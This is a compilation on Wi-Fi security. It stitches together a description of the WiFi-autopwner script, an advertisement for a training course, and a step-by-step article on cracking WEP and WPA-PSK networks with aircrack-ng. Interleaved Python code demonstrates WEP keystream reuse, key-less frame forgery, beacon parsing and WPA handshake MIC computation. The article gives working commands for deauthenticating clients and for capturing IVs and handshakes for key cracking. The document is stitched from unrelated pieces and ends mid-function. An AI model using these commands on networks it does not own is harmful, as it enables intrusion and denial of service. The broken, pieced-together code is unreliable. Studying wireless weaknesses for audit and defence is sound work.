Security audit of wireless Wi-Fi networks. WiFi-autopwner: a script for automatically finding and auditing Wi-Fi networks with weak security. Hacking wireless networks

Auditing wireless networks at each new location starts with the same steps:

  • search for open networks
  • search for and crack networks with WEP encryption
  • search for networks with WPS enabled and check them for susceptibility to the Pixie Dust attack
  • collect handshakes and run them through dictionaries

These actions are routine, and WiFi-autopwner aims to automate them fully so that no time is wasted on them.

After launch:

sudo bash wifi-autopwner.sh

A text menu will open:

If you have only one wireless interface, it is selected automatically. If there are several, go to the corresponding menu item and choose the interface you want to use. Next, switch this interface to monitor mode; the program offers two options: one simply switches the interface to monitor mode, the other also kills the processes that may interfere with it.

Now just select the ninth item, "Automatic audit of Wi-Fi networks", and go about your business. In automatic audit mode the program:

  • will search for open networks
  • will search for networks with WEP encryption and try to hack each of them
  • will search for WPS networks and try to perform a Pixie Dust attack against each of them
  • will try to collect handshakes for all networks within range.

Each stage has its own timeout, so the program will not get stuck at any one stage.

In the future, it is planned to add a dictionary and a function to automatically start cracking passwords from captured handshakes.

Searching for WPS pins

The program has built-in functionality for searching WPS pins. For a plain WPS pin search (without the Pixie Dust attack), select menu item 6, "Attack on WPS". Even if your Reaver constantly shows the errors WARNING: Failed to associate with and WPS transaction failed (code: 0x03), re-trying last pin, there is a chance that it will work in WiFi-autopwner.

The program finds access points with WPS by itself; you only need to select the number of the AP you want to attack.

Basic course (Code BT09), 2 days

Annotation

The purpose of this course is a practical study of the security problems and security features of wireless networks. The course alternates systematic theoretical material with practical work by the students under the guidance of an experienced instructor. The theoretical part covers the architecture of wireless networks, the existing standards in this area and the security mechanisms built into wireless networking equipment. In addition, an effective methodology is proposed for integrating a wireless network into an existing network infrastructure with all aspects of security taken into account. More than 50% of class time is spent on practical work at specially prepared stands illustrating various solutions for protecting wireless networks.

During the training process, students acquire skills in working with NetStumbler, Kismet, AirSnort, aircrack and other wireless network monitoring tools. Particular attention is paid to the use of the most common wireless network audit tools, both commercial and freely distributed.

Audience

Preliminary preparation

Basic knowledge of network technologies, the basic protocols and services of the TCP/IP stack, and skills in working with Windows 2003 and Linux. You can test your knowledge of the TCP/IP protocols by requesting a self-test from the Training Center. Knowledge of modern security technologies and protocols (VPN, PKI, IPSec) is welcome.

As preliminary preparation, we recommend taking the following courses:

  • BT05 "TCP/IP Basics"- intensive course on setting up and using TCP/IP stack protocols in various operating systems
  • BT03 "Computer Network Security" - in-depth course on network computer security issues

Upon completion of training

You will acquire systematic knowledge on:

  • Wireless network architecture
  • Available security mechanisms built into wireless networking equipment
  • Using additional wireless network security mechanisms
  • Features of using attack detection systems and security scanners in wireless networks
  • Security issues related to the use of Bluetooth devices

You can:

  • Enable basic data protection mechanisms in wireless networks
  • Increase the security of your wireless network using VPN and IEEE802.1x technologies
  • Monitor wireless networks
  • Perform wireless security audits

Additionally

Training in this course is counted toward the state documents on advanced training in the field of information security that the Informzashita Training Center issues to specialists, in accordance with the REGULATIONS on the conditions under which specialists receive state documents on advanced training in the field of information security.

Each student receives a branded certificate, a tutorial specifically designed for this course, and a CD containing versions of the main security tools discussed in the course as well as additional and background information on the subject of the course.

Course program

  • Wireless technologies - general information.
    Introduction. 802.11 standard. Equipment and architecture of wireless networks. Threats associated with the use of wireless networks. Working with the NetStumbler program. Detecting and connecting to a wireless network (practice).
  • Basic data protection mechanisms in wireless networks.
    DSSS technology. Filtering based on MAC addresses. Unauthorized connection to an access point that uses access control based on MAC addresses (practice). Use of security mechanisms built into access points. WEP protocol, its advantages and disadvantages. Kismet and AirSnort programs. Using WEP, cracking the WEP key (practice).
  • Protecting wireless networks at the network level.
    Separation of a wireless network into a separate segment. Using IPSec to protect wireless client traffic (practice). Application of VPN technologies to protect wireless networks (practice).
  • WPA (Wi-Fi Protected Access) and 802.11i standards.
    IEEE802.1x standard. Authentication protocols EAP, PEAP. Building a network infrastructure based on the recommendations of the IEEE802.1x standard (practice). TKIP protocol, Michael method and WPA technology. 802.11i standard.
  • Detection of attacks in wireless networks.
    Collection of information about wireless networks (war driving). Detection of unauthorized access points and wireless clients. Denial of service. Access point bypass. Protecting wireless network clients (practice). Using attack detection systems.
  • Wireless network audit.
    Specifics of security analysis of wireless networks. Security scanners for wireless networks (demonstration). Final recommendations.
  • WPAN networks.
    Bluetooth security. WPAN standards. Bluetooth architecture. Operating modes of Bluetooth devices. Search for Bluetooth devices using various tools. Vulnerabilities of Bluetooth devices, tools for identifying them.

The last few years have seen the rise of wireless technology. Wi-Fi networks (802.11a/b/g) are becoming increasingly popular, and while earlier they were used mainly in offices and hot spots, now they are widely used at home and for deploying mobile offices (offices during business trips). Wireless access points and SOHO-class wireless routers are sold specifically for home users and small offices, and pocket wireless routers for mobile users. However, when deciding to switch to a wireless network, remember that at the current stage of development it has one significant drawback: imperfect security. In this article we describe the most vulnerable areas of wireless networks and show with practical examples how they are attacked. This knowledge can be used to audit the security of wireless networks and to avoid the traditional mistakes made when deploying them. We first look at the basic security measures used to protect wireless networks today, and then at how attackers overcome them.

Wireless Network Security Methods

The 802.11a/b/g wireless network standards provide several security mechanisms:

  • authentication and data encryption mode using the WEP (Wired Equivalent Privacy) protocol;
  • authentication and data encryption mode using the WPA (Wi-Fi Protected Access) protocol;
  • filtering by MAC addresses;
  • using hidden network identifier mode.

WEP protocol

All modern wireless devices (access points, wireless adapters and routers) support the WEP security protocol, which was originally included in the IEEE 802.11 wireless network specification.

The WEP protocol allows you to encrypt the transmitted data stream based on the RC4 algorithm with a key size of 64 or 128 bits. Some devices also support keys of 152, 256 and 512 bits, but this is rather the exception to the rule. The keys have a so-called static component of 40 and 104 bits in length, respectively, for 64- and 128-bit keys, as well as an additional dynamic component of 24 bits in size, called the Initialization Vector (IV).

At the simplest level, the WEP encryption procedure is as follows. First an integrity checksum (CRC-32) of the data to be transmitted is computed and appended to the data as the Integrity Check Value (ICV). Next, a 24-bit initialization vector (IV) is generated and concatenated with the static (40- or 104-bit) secret key. The resulting 64- or 128-bit key seeds the RC4 generator, which produces the pseudo-random keystream used to encrypt the data. The data together with the ICV are then XORed with the keystream, and the IV is placed in clear in the frame header so that the receiver can reproduce the same keystream.

On the receiving side, the data can be decrypted, since information about the initialization vector is transmitted along with it, and the static component of the key is stored by the user to whom the data is transferred.

The WEP protocol provides two methods of user authentication: Open System and Shared Key. With Open System authentication no authentication actually takes place, so any user can join the wireless network. However, even with Open System authentication WEP data encryption can be enabled.
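The procedure above, as an added example that is not part of the original article: a Python model of WEP framing (RC4 keystream seeded with IV||key, CRC-32 ICV appended to the data) with the receiver's check, plus two consequences of that design: keystream reuse when an IV repeats, and key-less bit flipping of an encrypted frame because CRC-32 is affine. The 40-bit key, IVs and payloads are constructed values, not from any real network.

```python
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 keystream of the requested length (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                     # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP Integrity Check Value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(static_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on the air: IV (3 bytes, in clear) | key id (1) | RC4(IV||key)(plaintext||ICV)."""
    assert len(iv) == 3 and len(static_key) in (5, 13)      # 40- or 104-bit static key
    clear = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(clear, rc4_keystream(iv + static_key, len(clear)))


def wep_decrypt(static_key: bytes, frame: bytes):
    """Receiver side: rebuild the keystream from the transmitted IV; None if the ICV fails."""
    iv, body = frame[:3], frame[4:]
    clear = xor(body, rc4_keystream(iv + static_key, len(body)))
    data, tag = clear[:-4], clear[-4:]
    return data if tag == icv(data) else None


def keystream_reuse(frame_a: bytes, frame_b: bytes):
    """Weakness 1: two frames with the same IV (and key) use the same keystream, so
    XORing the ciphertexts cancels it and yields plaintext_a XOR plaintext_b, no key needed."""
    if frame_a[:3] != frame_b[:3]:
        return None
    n = min(len(frame_a), len(frame_b)) - 8                  # strip IV/key id and the ICV
    return xor(frame_a[4:4 + n], frame_b[4:4 + n])


def wep_bitflip(frame: bytes, delta: bytes) -> bytes:
    """Weakness 2: CRC-32 is affine (crc(a^d) = crc(a)^crc(d)^crc(0...0)), so an attacker
    can XOR `delta` into the encrypted payload and patch the encrypted ICV to match,
    without knowing the key or the keystream. The receiver's ICV check still passes."""
    n = len(frame) - 8
    assert len(delta) == n
    icv_delta = xor(icv(delta), icv(b"\x00" * n))
    return frame[:4] + xor(frame[4:4 + n], delta) + xor(frame[4 + n:], icv_delta)


if __name__ == "__main__":
    key = bytes.fromhex("0123456789")                      # constructed 40-bit key
    frame = wep_encrypt(key, b"\x01\x02\x03", b"hello")
    print("decrypts to", wep_decrypt(key, frame))
    print("after key-less bit flip:", wep_decrypt(key, wep_bitflip(frame, b"\x00\x00\x00\x00\x20")))
```

With only 2^24 IVs, a busy network repeats IVs within hours, which is what makes the IV-collection stage of the attack described later work; the bit-flip function shows why the CRC-32 "integrity" check gives no protection against forged frames.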

WPA protocol

In 2003 another security standard, WPA, was introduced. Its main feature is dynamic generation of data encryption keys based on TKIP (Temporal Key Integrity Protocol), which keeps the RC4 cipher of WEP but wraps it in per-packet key mixing. With TKIP, network devices work with a 48-bit initialization vector (instead of the 24-bit WEP vector) and follow rules for sequencing it that rule out key reuse. TKIP derives a new 128-bit per-packet key for each transmitted packet. In addition, the cryptographic checksum in WPA is computed by a new method, MIC (Message Integrity Code, known as Michael). Each frame carries a special eight-byte message integrity code whose verification allows forged packets to be rejected. As a result, every data packet transmitted over the network is encrypted with its own key, and every wireless device holds a dynamically changing key.

In addition, WPA also supports encryption with the more advanced AES (Advanced Encryption Standard), a stronger cryptographic algorithm than the RC4 used by WEP and TKIP.

When deploying wireless networks at home or in small offices, the variant of WPA based on a shared key, WPA-PSK (Pre-Shared Key), is usually used. Below we consider only WPA-PSK, without touching the enterprise variants of WPA in which user authentication is performed on a separate RADIUS server.

When using WPA-PSK, a password of 8 to 63 characters is specified in the access point settings and in the clients' wireless connection profiles.

MAC Address Filtering

MAC address filtering, which is supported by all modern access points and wireless routers, is not part of the 802.11 standard but is nevertheless considered to improve the security of a wireless network. To implement it, a table of the MAC addresses of the wireless adapters of clients authorized to work on the network is created in the access point settings.

Hidden SSID mode

Another precaution often used in wireless networks is hidden network identifier mode. Each wireless network is assigned an identifier (SSID), which is the name of the network. When a user tries to join a network, the wireless adapter driver first scans the air for available networks. When hidden identifier mode (usually called Hide SSID) is enabled, the network does not appear in the list of available networks, and you can connect to it only if, first, its SSID is known exactly and, second, a connection profile for this network has been created in advance.

Hacking wireless networks

Having familiarized ourselves with the main methods of protecting 802.11a/b/g networks, we will consider ways to overcome them. Note that the same tools are used to hack WEP and WPA networks, so first we will tell you what is included in the attacker’s arsenal.

First of all, we need a laptop with a wireless adapter. The main problem when choosing wireless hacking tools is compatibility between the wireless adapter's chipset, the software used and the operating system.

Selecting a wireless adapter

The fact is that most utilities that allow you to hack wireless networks are designed for Linux systems. There are versions of some utilities for Windows XP. However, depending on the wireless adapter chip, certain wireless cards can be used with utilities for both Linux and Windows XP systems, and some wireless adapters can be used with utilities only under Linux or only under Windows XP systems. There are wireless adapters that are not supported by either Linux or Windows XP utilities. In addition, there are chips that, although supported by utilities, work extremely slowly (in terms of capturing and analyzing packets).

The reason is that cracking wireless networks requires special (non-standard) drivers for the wireless adapter. The standard modes of any wireless adapter are Infrastructure (Basic Service Set, BSS) and ad-hoc (Independent Basic Service Set, IBSS). In Infrastructure mode each client connects to the network through an access point; in ad-hoc mode adapters communicate with each other directly, without an access point. Neither mode lets the adapter listen on the air and intercept packets: in both cases the adapter only receives frames addressed to the network it is configured for. To see other networks (including those with a hidden ESSID) and capture their packets there is a special monitor mode, in which the adapter is not associated with any network and receives every frame it can hear. The drivers supplied by adapter manufacturers usually do not support monitor mode, so special drivers, often written by third-party developers, have to be installed. Note that for Windows such drivers exist only for adapters based on Hermes, Realtek, Aironet and Atheros chips. Under Linux/BSD, monitor-mode support is determined largely by how open the card's specifications are, and the list of supported devices is much longer than for Windows: drivers with monitor mode exist for adapters based on Prism, Orinoco, Atheros, Ralink, Aironet, Realtek, Hermes and Intel chipsets, although the Intel drivers do not suit every device.

Currently, all laptops based on Intel Centrino mobile technology have built-in wireless adapters with Intel chips (IPW2100, IPW2200, IPW2915, IPW3945), but these adapters are not suitable for our purposes: although they are compatible with the Linux utilities used for cracking, they work extremely slowly, and they are incompatible with the Windows utilities altogether.

Selecting an operating system

Regarding the choice of operating system, the following recommendations can be given. Linux systems are preferable for these purposes, since the range of available tools is much wider under Linux and the Linux utilities work much faster. This does not mean that Windows XP with Windows utilities cannot be used. Below we consider both options, using both Linux and Windows utilities. At the same time, we understand that not all users are eager to switch from Windows to Linux: for all its shortcomings, Windows is far more widespread and much easier for a novice to learn. Therefore, in our opinion, the optimal option is to keep Windows XP as the main operating system on the laptop and to use a Linux Live CD for wireless network cracking; it runs from a CD and requires no installation on the hard disk. The best choice in our case is the BackTrack disk, built on Linux (kernel version 2.6.18.3), which contains all the tool packages needed for cracking networks. An image of the disk can be downloaded from http://www.remote-exploit.org/backtrack.html.

Software Set

Traditionally, the aircrack-ng software package is used to crack wireless networks; it exists in versions for Windows XP (aircrack-ng 0.6.2-win) and Linux (aircrack-ng 0.7). The package is free and can be downloaded from the official website www.aircrack-ng.org. There is little point looking for other utilities, since this package is a best-in-class solution. In addition, the Linux version is included on the BackTrack disk.

Hacking Wireless Networks Using a BackTrack Live CD

So, whatever operating system is installed on your laptop, we will use the BackTrack boot disk. Note that besides the tools we need to crack a wireless network, this disk contains many other network auditing utilities (port scanners, sniffers, etc.). Such a disk is useful for any system administrator engaged in network auditing.

Hacking any wireless network using the BackTrack disk is carried out in three stages (Table 1):

  • collecting information about the wireless network;
  • packet capture;
  • packet analysis.

The first step is to collect detailed information about the wireless network being attacked: the MAC addresses of the access point and of an active client, the network name (network ID) and the type of encryption used. The airmon-ng, airodump-ng and Kismet utilities are used for this: the first puts the wireless adapter's driver into monitor mode, and the other two gather the necessary information about the network. All of these utilities are included on the BackTrack disk.

Table 1. Steps to hack a wireless network using the BackTrack Live CD

Stage | Description                             | Utilities used                    | Result
1     | Collecting wireless network information | airmon-ng, airodump-ng, Kismet    | Access point MAC address, active client MAC address, network type, network ID, encryption type (WEP, WPA-PSK), channel number
2     | Packet interception                     | airodump-ng, Kismet, aireplay-ng  | Capture file with IV packets (WEP) or with the client authentication handshake (WPA-PSK)
3     | Packet analysis                         | aircrack-ng                       | Key selection (WEP) or password selection (WPA-PSK)

The next step is to capture packets with the airodump-ng utility. If WEP encryption is used on the network, IV packets (packets carrying initialization vectors) must be collected. If traffic on the network is low (for example, the client is inactive), the aireplay-ng utility can additionally be used to increase the traffic between the client and the access point.

If the network uses WPA-PSK encryption, the packets to collect are those carrying the client's authentication to the network (the handshake). To force the client through the authentication procedure, aireplay-ng can be used to disconnect it from the network, after which it reconnects.

At the last stage the captured data is analysed with the aircrack-ng utility. For WEP encryption the probability of recovering the key depends on the number of IV packets collected; for WPA-PSK it depends on the dictionary used to guess the password.

Practical examples

After this brief description of the procedure, let us move on to practical examples with a detailed description of each stage and the utilities used.

In our case, we were dealing with an experimental network consisting of a D-Link DWL-7000AP access point and a network client with a Gigabyte GN-WPEAG wireless PCI adapter.

To hack the network, we used a laptop with a Gigabyte GN-WMAG wireless PCMCIA adapter based on the Atheros chip. Note that when using the BackTrack disk, no additional drivers are required for the Gigabyte GN-WPEAG adapter - everything is already on the disk.

Stage 1. Collecting information about the wireless network

So, at the first stage we need to collect information about the wireless network. Insert the wireless adapter into the laptop and boot the operating system from the CD. Then open a console and run the airmon-ng utility, which is part of the aircrack-ng package.

This utility allows you to determine the available wireless interfaces and assign the network monitoring mode to one of the available interfaces.

The syntax of the airmon-ng command is as follows:

airmon-ng <start|stop> <interface> [channel]

where <start|stop> switches monitor mode on or off, <interface> is the wireless interface to put into monitor mode, and the optional [channel] parameter sets the channel to monitor.

Initially, the airmon-ng command is specified without parameters, which allows you to get a list of available wireless interfaces. For example, in our case, the response to the airmon-ng command was as follows:

Usage: airmon-ng <start|stop> <interface> [channel]

Interface   Chipset   Driver
wifi0       Atheros   madwifi-ng
ath0        Atheros   madwifi-ng VAP (parent: wifi0)

Selecting wifi0 as the wireless interface, enter the command airmon-ng start wifi0. As a result we get another interface, ath1, which is in monitor mode (Fig. 1).

Fig. 1. Putting the wireless adapter into monitor mode

Next, you need to run the airodump-ng utility, which is used both to capture packets in 802.11 wireless networks and to collect information about the wireless network. The syntax for using the command is as follows:

airodump-ng <options> <interface>

Possible command options are shown in the table. 2.

Table 2. Possible options for the airodump-ng command (option names as in airodump-ng's own usage output)

Option          | Possible value            | Description
--ivs           |                           | Save only IV packets
--gpsd          |                           | Use the GPS daemon; the coordinates of the receiving point are recorded as well
--write (or -w) | file name                 | Name of the file to write to. If only a file name is given, the file is saved in the program's working directory
(no --ivs)      |                           | Record all packets without filtering
--channel       | channel number (1 to 11)  | Channel to listen on. By default all channels are scanned in turn
--band          | a, b or g                 | Specifies the 802.11a/b/g band

In our case, the ath1 interface is set to monitoring mode.

However, so far we do not know the network type (802.11a/b/g) or the encryption type, and therefore we do not know which packets to capture (all of them or only IV packets). So at first airodump-ng should be run without options, specifying only the interface; this lets us gather the necessary information about the network.

Thus, in the first stage, we launch the airodump-ng command using the following syntax:

airodump-ng ath1

This will allow us to obtain the necessary information about the network, namely:

  • MAC address of the access point;
  • Client MAC address;
  • network type;
  • network ESSID;
  • encryption type;
  • communication channel number.

In our example, by entering the airodump-ng ath1 command, we were able to determine all the necessary network parameters (Fig. 2):

Fig. 2. Gathering information about the network using the airodump-ng utility

  • The MAC address of the access point is 00:0D:88:56:33:B5;
  • Client MAC address - 00:0E:35:48:C4:76
  • network type - 802.11g;
  • Network ESSID - dlinkG;
  • encryption type - WEP;
  • communication channel number - 11.

Note that airodump-ng can determine the network identifier (ESSID) even when the access point is in Hidden SSID mode: the name is taken from the probe responses and association requests exchanged with clients, so an active client is needed.

Kismet, also included on the BackTrack disk, can be used to collect information about the network as well. Unlike airodump-ng, it gathers much more information about the wireless network and in this sense is a complete, best-in-class wireless network analyzer. It has a graphical interface (Fig. 3), which makes it much easier to work with.

Fig. 3. Gathering information about the network using the Kismet utility
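As an added example (not from the article or the aircrack-ng project): a Python parser for the management frames that airodump-ng and Kismet listen to in Stage 1. It extracts the BSSID, ESSID, channel (DS Parameter Set tag) and encryption type (RSN IE, WPA vendor IE, or the Privacy capability bit alone meaning WEP) from beacon and probe response frames, and shows how the ESSID of a hidden network is filled in from a probe response. The frames are constructed inline; the BSSID 00:11:22:33:44:55 and the network name "office" are made up, the dlinkG access point is the one from the text.

```python
import struct

BEACON, PROBE_RESP = 0x80, 0x50          # frame control byte 0: management type, subtype 8 / 5
CAP_PRIVACY = 0x0010                     # capability bit: encrypted; WEP unless an RSN/WPA IE is present
RSN_AKM_PSK = bytes.fromhex("000fac02")  # RSN AKM suite selector for pre-shared key
WPA_IE_HEAD = bytes.fromhex("0050f201")  # vendor-specific IE: Microsoft OUI + type 1 = WPA (pre-802.11i)


def build_mgmt_frame(subtype, bssid, ssid, channel, security):
    """Construct a beacon or probe response for the demo (not a real capture)."""
    hdr = struct.pack("<BBH6s6s6sH", subtype, 0, 0, b"\xff" * 6, bssid, bssid, 0)
    cap = CAP_PRIVACY if security != "OPN" else 0
    fixed = struct.pack("<QHH", 0, 100, cap)               # timestamp, beacon interval, capability
    tags = bytes([0, len(ssid)]) + ssid.encode()           # tag 0: SSID; zero length = hidden
    tags += bytes([3, 1, channel])                          # tag 3: DS parameter set = channel
    if security == "WPA2":
        rsn = (b"\x01\x00" + bytes.fromhex("000fac04")       # version 1, group cipher CCMP
               + b"\x01\x00" + bytes.fromhex("000fac04")     # one pairwise cipher: CCMP
               + b"\x01\x00" + RSN_AKM_PSK + b"\x00\x00")    # one AKM: PSK; RSN capabilities
        tags += bytes([48, len(rsn)]) + rsn
    elif security == "WPA":
        wpa = (WPA_IE_HEAD + b"\x01\x00" + bytes.fromhex("0050f202")
               + b"\x01\x00" + bytes.fromhex("0050f202")
               + b"\x01\x00" + bytes.fromhex("0050f202"))    # TKIP group, TKIP pairwise, PSK
        tags += bytes([221, len(wpa)]) + wpa
    return hdr + fixed + tags


def parse_mgmt_frame(frame):
    """Pull out what Stage 1 needs: BSSID, ESSID, channel and encryption type."""
    if len(frame) < 36 or frame[0] not in (BEACON, PROBE_RESP):
        return None
    info = {"bssid": ":".join(f"{b:02X}" for b in frame[16:22]),
            "essid": None, "channel": None, "encryption": "OPN"}
    cap = struct.unpack("<H", frame[34:36])[0]
    rsn = wpa = None
    pos = 36
    while pos + 2 <= len(frame):                            # walk the tagged parameters
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if len(value) < length:
            break                                           # truncated tag: never read past the frame
        if tag == 0 and length:
            info["essid"] = value.decode("utf-8", "replace")
        elif tag == 3 and length == 1:
            info["channel"] = value[0]
        elif tag == 48:
            rsn = value
        elif tag == 221 and value.startswith(WPA_IE_HEAD):
            wpa = value
        pos += 2 + length
    if rsn is not None:
        info["encryption"] = "WPA2-PSK" if RSN_AKM_PSK in rsn else "WPA2"
    elif wpa is not None:
        info["encryption"] = "WPA"
    elif cap & CAP_PRIVACY:
        info["encryption"] = "WEP"
    return info


def survey(frames):
    """One row per BSSID. A hidden network's beacon carries an empty SSID, but the
    probe response the AP sends to a client carries the real one, so the row fills in."""
    table = {}
    for frame in frames:
        rec = parse_mgmt_frame(frame)
        if rec is None:
            continue
        row = table.setdefault(rec["bssid"], rec)
        if row["essid"] is None and rec["essid"] is not None:
            row["essid"] = rec["essid"]
    return table


AP = bytes.fromhex("000d885633b5")                          # access point MAC from the text
HIDDEN_AP = bytes.fromhex("001122334455")                   # made-up second AP
SAMPLE_FRAMES = [                                           # constructed, not captured
    build_mgmt_frame(BEACON, AP, "dlinkG", 11, "WEP"),
    build_mgmt_frame(BEACON, HIDDEN_AP, "", 6, "WPA2"),     # hidden SSID beacon
    build_mgmt_frame(PROBE_RESP, HIDDEN_AP, "office", 6, "WPA2"),
]

if __name__ == "__main__":
    for row in survey(SAMPLE_FRAMES).values():
        print(row)
```

The same walk over tagged parameters is what a sniffer does for every beacon it hears; the truncated-tag check matters because frame lengths on the air are attacker-controlled.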

Stage 2: Packet interception

Once detailed information about the wireless network has been collected, you can begin intercepting packets using the same utilities that were used to collect information about the network - airodump-ng or Kismet. However, in this case we will need a slightly different command syntax.

WEP encryption

First, let's consider the option when the network uses WEP encryption. In this case, we need to filter only packets with an initialization vector (IV packets) and write them to a file, which will later be used to select a key.

For example, if it is known that the attacked network is an 802.11g network, it uses WEP encryption and transmission is carried out on channel 11, then the command syntax for intercepting packets could be as follows:

airodump-ng --ivs -w dump --band g --channel 11 ath1

In this example we write only IV packets to a file named dump. The probability of successful key recovery depends on the number of IV packets accumulated and on the key length. As a rule, with a 128-bit key it is enough to accumulate about 1-2 million IV packets, and with a 64-bit key on the order of several hundred thousand. However, the key length is not known in advance and no utility can determine it, so it is desirable to capture at least 1.5 million packets for analysis. Fig. 4 shows an example of 1,137,637 IV packets captured in airodump-ng.

Fig. 4. Capturing packets with the airodump-ng utility

The number of packets captured is interactively displayed in the airodump-ng utility, and to stop the packet capture process you just need to press the Ctrl+C key combination.

Kismet can also be used to capture packets. Capture actually begins as soon as the utility is launched, and the packets are written to a file with the dump extension in the program's working directory. Unlike airodump-ng, however, Kismet cannot filter only IV packets or lock on to a single channel, so the rate at which useful packets accumulate is lower, and more packets need to be captured than with airodump-ng.

Often there is little traffic between the access point and the client, so you would have to wait a very long time to accumulate the number of packets needed for a successful attack. The process can be accelerated by forcing the client to exchange traffic with the access point using the aireplay-ng utility (Fig. 5). It is run in parallel with airodump-ng, so a second console session is needed.

Fig. 5. Using the aireplay-ng utility to stimulate traffic between the access point and the client

The command syntax is as follows:

aireplay-ng <options> <interface>

This command has a very large number of options, which can be viewed by running it without parameters.

For our purposes, the command syntax will look like this:

aireplay-ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 --deauth 20 ath1

Here -e dlinkG specifies the network ID; -a 00:0d:88:56:33:b5 is the MAC address of the access point; -c 00:0f:ea:91:7d:95 is the client's MAC address; and --deauth 20 is a deauthentication attack (20 times) after which the client re-authenticates. When the client re-authenticates, the traffic between it and the access point rises sharply and so does the number of packets that can be captured. If necessary, increase the number of deauthentications or repeat the command until enough packets have accumulated.

WPA-PSK encryption

With WPA-PSK encryption the capture procedure is slightly different. There is no point filtering IV packets, since WPA-PSK cannot be attacked through them, but there is also no point capturing everything. All we need is a small part of the traffic between the access point and the client: the packets of the client's authentication procedure (the handshake). To capture it, the procedure must first be forced with the aireplay-ng utility.

Therefore, with WPA-PSK the capture procedure is as follows. Open two console sessions. In the first, start packet capture (airodump-ng); in the second, a second or two later, run the command that forces the client off the network so that it re-authenticates (aireplay-ng, deauthentication attack). Starting the capture first ensures the handshake is not missed. The commands are:

airodump-ng -w dump --band g --channel 11 ath1

aireplay-ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 --deauth 10 ath1

As you can see, the aireplay-ng syntax is exactly the same as for WEP, where the command was used to stimulate traffic between the access point and the client (the only difference is the smaller number of deauthentication packets). The airodump-ng command lacks the IV packet filter.

Capture needs to continue for only a few seconds: with the deauthentication attack running, the probability of capturing the handshake packets is close to 100%.

Stage 3: Packet Analysis

At the last stage the captured packets are analysed with the aircrack-ng utility, launched in a console session. Naturally, the aircrack-ng syntax differs for WEP and WPA-PSK. The general syntax is:

aircrack-ng <options> <capture file(s)>

Possible options are given in Table 3. Note that several files with the *.cap or *.ivs extension can be specified as capture files. In addition, when cracking WEP networks, airodump-ng and aircrack-ng can run simultaneously (in two console sessions); aircrack-ng then automatically re-reads the growing set of IV packets.
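As an added example (not from the article or from aircrack-ng) that serves both the WPA-PSK description earlier and this stage: a Python implementation of what aircrack-ng -a 2 does with a captured handshake. The pre-shared key derivation (PBKDF2-HMAC-SHA1 over the SSID, 4096 iterations), the 802.11i PRF-512 that turns the PMK, the two MAC addresses and the two nonces into the PTK, and the EAPOL-Key MIC over message 2 are implemented as the standard specifies; the nonces, passphrase and wordlist are constructed, and the EAPOL-Key frame is a minimal message 2 rather than a real capture. It also shows why this is a dictionary attack rather than a key-recovery attack: each candidate costs a full PBKDF2 derivation and can only be confirmed or rejected.

```python
import hashlib
import hmac
import struct

# Constructed handshake material for the demo. In practice the MACs and nonces are
# read from messages 1 and 2 of the captured 4-way handshake.
SSID = "dlinkG"                                  # network name used in the text
AP_MAC = bytes.fromhex("000d885633b5")           # access point MAC from the text
STA_MAC = bytes.fromhex("000e3548c476")          # client MAC from the text
ANONCE = bytes(range(32))                        # assumed nonce from message 1
SNONCE = bytes(range(32, 64))                    # assumed nonce from message 2
PASSPHRASE = "correct-horse-11"                  # assumed secret the attacker must recover
MIC_OFFSET = 81                                  # MIC field position in the EAPOL frame built below


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: Pairwise Transient Key from the PMK, both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]                 # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_key_frame(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2: 802.1X header followed by the RSN key descriptor."""
    key_info = 0x0109                            # descriptor version 1 (HMAC-MD5 MIC), pairwise, MIC bit
    body = struct.pack("!BHH8s32s16s8s8s16sH", 2, key_info, 16, b"\x00" * 8, snonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, 0)
    return struct.pack("!BBH", 1, 3, len(body)) + body     # version 1, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the frame with its MIC field zeroed; the algorithm is chosen by the
    descriptor-version bits of Key Information (1 = HMAC-MD5, 2 = HMAC-SHA1 truncated to 128 bits)."""
    version = struct.unpack("!H", frame[5:7])[0] & 0x7
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_handshake(passphrase: str) -> bytes:
    """What the client sends as message 2; this is the frame airodump-ng captures."""
    kck = prf_512(wpa_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_key_frame(SNONCE, eapol_mic(kck, eapol_key_frame(SNONCE)))


def crack_psk(captured: bytes, wordlist):
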